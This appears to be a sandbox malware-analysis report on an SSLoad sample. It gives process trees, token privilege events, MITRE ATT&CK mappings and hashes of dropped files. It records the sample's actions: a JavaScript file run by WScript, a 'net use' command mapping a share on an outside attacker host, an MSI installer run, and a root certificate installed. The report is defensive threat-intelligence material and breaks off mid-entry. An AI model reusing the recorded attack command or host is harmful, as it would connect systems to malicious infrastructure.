Token: SeSecurityPrivilege	3316	7zFM.exe
Token: SeShutdownPrivilege	3080	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3080	msiexec.exe
Token: SeSecurityPrivilege	4212	msiexec.exe
Token: SeCreateTokenPrivilege	3080	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3080	msiexec.exe
Token: SeLockMemoryPrivilege	3080	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3080	msiexec.exe
Token: SeMachineAccountPrivilege	3080	msiexec.exe
Token: SeTcbPrivilege	3080	msiexec.exe
Token: SeSecurityPrivilege	3080	msiexec.exe
Token: SeTakeOwnershipPrivilege	3080	msiexec.exe
Token: SeLoadDriverPrivilege	3080	msiexec.exe
Token: SeSystemProfilePrivilege	3080	msiexec.exe
Token: SeSystemtimePrivilege	3080	msiexec.exe
Token: SeProfSingleProcessPrivilege	3080	msiexec.exe
Token: SeIncBasePriorityPrivilege	3080	msiexec.exe
Token: SeCreatePagefilePrivilege	3080	msiexec.exe
Token: SeCreatePermanentPrivilege	3080	msiexec.exe
Token: SeBackupPrivilege	3080	msiexec.exe
Token: SeRestorePrivilege	3080	msiexec.exe
Token: SeShutdownPrivilege	3080	msiexec.exe
Token: SeDebugPrivilege	3080	msiexec.exe
Token: SeAuditPrivilege	3080	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3080	msiexec.exe
Token: SeChangeNotifyPrivilege	3080	msiexec.exe
Token: SeRemoteShutdownPrivilege	3080	msiexec.exe
Token: SeUndockPrivilege	3080	msiexec.exe
Token: SeSyncAgentPrivilege	3080	msiexec.exe
Token: SeEnableDelegationPrivilege	3080	msiexec.exe
Token: SeManageVolumePrivilege	3080	msiexec.exe
Token: SeImpersonatePrivilege	3080	msiexec.exe
Token: SeCreateGlobalPrivilege	3080	msiexec.exe
Token: SeCreateTokenPrivilege	3080	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3080	msiexec.exe
Token: SeLockMemoryPrivilege	3080	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3080	msiexec.exe
Token: SeMachineAccountPrivilege	3080	msiexec.exe
Token: SeTcbPrivilege	3080	msiexec.exe
Token: SeSecurityPrivilege	3080	msiexec.exe
Token: SeTakeOwnershipPrivilege	3080	msiexec.exe
Token: SeLoadDriverPrivilege	3080	msiexec.exe
Token: SeSystemProfilePrivilege	3080	msiexec.exe
Token: SeSystemtimePrivilege	3080	msiexec.exe
Token: SeProfSingleProcessPrivilege	3080	msiexec.exe
Token: SeIncBasePriorityPrivilege	3080	msiexec.exe
Token: SeCreatePagefilePrivilege	3080	msiexec.exe
Token: SeCreatePermanentPrivilege	3080	msiexec.exe
Token: SeBackupPrivilege	3080	msiexec.exe
Token: SeRestorePrivilege	3080	msiexec.exe
Token: SeShutdownPrivilege	3080	msiexec.exe
Token: SeDebugPrivilege	3080	msiexec.exe
Token: SeAuditPrivilege	3080	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3080	msiexec.exe
Token: SeChangeNotifyPrivilege	3080	msiexec.exe
Token: SeRemoteShutdownPrivilege	3080	msiexec.exe
Token: SeUndockPrivilege	3080	msiexec.exe
Token: SeSyncAgentPrivilege	3080	msiexec.exe
Token: SeEnableDelegationPrivilege	3080	msiexec.exe
Token: SeManageVolumePrivilege	3080	msiexec.exe
Token: SeImpersonatePrivilege	3080	msiexec.exe
Token: SeCreateGlobalPrivilege	3080	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe7zFM.exemsiexec.exemsiexec.exetaskmgr.exe

pid	process
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
3316	7zFM.exe
4628	msedge.exe
3316	7zFM.exe
3316	7zFM.exe
3080	msiexec.exe
3444	msiexec.exe
3444	msiexec.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exetaskmgr.exe

pid	process
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
4628	msedge.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe
2408	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

StartMenuExperienceHost.exe

pid process

3748 StartMenuExperienceHost.exe

pid	process
3748	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4628 wrote to memory of 1408	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1408	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1680	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1796	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1796	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe
PID 4628 wrote to memory of 1000	4628	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://malware-traffic-analysis.net/2024/04/17/2024-04-17-SSLoad-malware-and-artifacts.zip
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9428a46f8,0x7ff9428a4708,0x7ff9428a4718
2⤵
PID:1408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
2⤵
PID:1680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
2⤵
PID:1000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
2⤵
PID:2564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
2⤵
PID:3460

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
2⤵
PID:1672

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
2⤵
PID:1448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
2⤵
PID:4492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5184 /prefetch:8
2⤵
PID:1420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
2⤵
PID:2188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6044 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
2⤵
PID:4204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
2⤵
PID:1336

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4548

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2904

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1412

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\2024-04-17-SSLoad-malware-and-artifacts.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3316

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.txt
1⤵
PID:4568

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js
1⤵
PID:4744

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js"
1⤵
- Blocklisted process makes network request
- Modifies system certificate store
PID:3452

C:\Windows\system32\net.exe
net use A: \\krd6.com@80\share\ /persistent:no
1⤵
- Process spawned unexpected child process
PID:2060

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js"
1⤵
- Modifies system certificate store
PID:4672

C:\Windows\system32\net.exe
net use A: \\krd6.com@80\share\ /persistent:no
1⤵
- Process spawned unexpected child process
PID:460

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js
1⤵
PID:556

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.js"
1⤵
PID:5056

C:\Windows\system32\net.exe
net use A: \\krd6.com@80\share\ /persistent:no
1⤵
- Process spawned unexpected child process
PID:5024

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\kjgghhj\2024-04-17-IOCs-from-SSLoad-activity.txt
1⤵
PID:912

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\kjgghhj\avp.msi"
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3080

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding AE37186F3A7DA742CD4F5E228706B755 C
2⤵
- Loads dropped DLL
PID:3736

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 448AB9541D633E9FD8198653CCCBE003 C
2⤵
- Loads dropped DLL
PID:5088

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:808

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CE9E199AA7B76E7B39604F73F6D56660
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1952

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:2756

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /f "C:\Users\Admin\Desktop\kjgghhj\avp.msi"
1⤵
PID:2968

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\kjgghhj\avp.msi"
1⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:3444

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2408

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5a8be7.rbs
Filesize
1KB

MD5
a0a7a241b8c58898ba262f98d0157658

SHA1
5d5a2381b037e1a2a503d8bed862f596252dbc28

SHA256
8b4ff903e0e136fcb56605660b7aa8d51e65a0450fa5b7710824a2f826be9c49

SHA512
5f868f4044c3df11fa4bb4f23007efad830b46bb0f2ee772a6634876eb8499c132583f43f875443e0959108628506dbb18d670871258fce3bfcada741e632140

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_D51703210E24E5BE9834FB730147157F
Filesize
1KB

MD5
bb06ce99ccfa5cb285e5df127cdd634c

SHA1
b84c5a177c1a08f037fc7e7681625f7caa225cf5

SHA256
10f5e81a81da6eaea873d03dde62fef03d4df1c176a43f6af807dfe997af6ae3

SHA512
33f690eeaf9d5850a545ff2e88778224861b87e7ec9ecfd832ddfd287bf213a469676df5cf09e532ddb7060c8a31f13e99f237461f936898987500282a8ab1cd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E
Filesize
1KB

MD5
b340f5f01c138c326f8db7c21556b9df

SHA1
2bf8956694e3ee5796c31a6aa4ea7707650732ca

SHA256
fa0b5479235a952591306e204e27d33c4870f48f0c1708ca77f5c1a9a4f3221e

SHA512
e056ea7305482f2b561427190aa84ccc7407e6e0a27c44595806b2e6511533742f6e7c1317d9005f959593e6e69990130402580bc588fcd398b0ae6492d7b3f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_D51703210E24E5BE9834FB730147157F
Filesize
540B

MD5
64dc1cab145347d4f9ca777a6c2aba2d

SHA1
ec7d025bfce46b9c7e1c64249e3bf2216e866d0f

SHA256
ced28eeb41197c4efff6ede915bc42b3a1a7b99b12d5ecb08777070e26e36b72

SHA512
fabbde1c8353dc7d5cee85612f11da399045f97bd315155e26c20a9080fffa510ae6ace81eb886a3be8a856ea44a066f9cc24972eccc86bf16528bfeceda365d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E
Filesize
536B

MD5
bf88d231c2335215d653403ec64953b3

SHA1
8161d39ee8bd0c84b9fb9ccb1761ae08407bce9b

SHA256
0d75a6a173a1fc11561ee105f7f5c92af95ea9fe12d4ecccdacf1a435745c9c2

SHA512
8f8e7da4fd7b97708d69c13217358fdd428b3ebfdea6406cb5d8bf2100ff58ecb8e671e7c4b9d617c41a1d206a5e1a6d4df1b664c5667993457dd775a0988cc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4b4f91fa1b362ba5341ecb2836438dea

SHA1
9561f5aabed742404d455da735259a2c6781fa07

SHA256
d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c

SHA512
fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
eaa3db555ab5bc0cb364826204aad3f0

SHA1
a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca

SHA256
ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b

SHA512
e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
d20161000a5f66b5af252b235e4204cb

SHA1
c157a794e40f0756be5b44ad8dd2fa6943c97a38

SHA256
4b6644217af9f9f7865058afa8c8980006a43ff4cdc46a7d14ff385db9e89675

SHA512
f22d0a99ec0792748e659d4a490d1bf91c32a6a8c99ff4d209a9788dacbed96b5c0403e4ad7a4d7a9ada0e0c530a935a07fc9d9aad81755dec3ff431d5c860e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
fd23835304281e128136b36da36b7c31

SHA1
de2026562b0db01c0e215d978744cf50f1300e3e

SHA256
8c916f389c5d2b34edc5110035add12a60ea387c9fbbcc1b8aba4579efc4757e

SHA512
29647e897ea6a6fa8920e393d367d3dad6ea09b67bd280bd56a48d28349cdbdbdc6eec54060da2d6a6ced48d86ce83075a7b6c9e615194c8869a41b114c26725

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
92bb7e4adadf14e7f302b67d4357cc07

SHA1
d366c3949e5eb71cb551455ad816e9fe3b2a6a48

SHA256
304f0c99bbdbe74fdecefdfecdcfc2e3ba9d4a4d77b4d3d57033f044adbef3d3

SHA512
45389e50276ef2bab5ae71fc8ee5158b51fa23619b15816366c67c246254523803f7344ffa33f539fe4869e3925dc745b5e8dd6c35a204443546ab9184b577a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
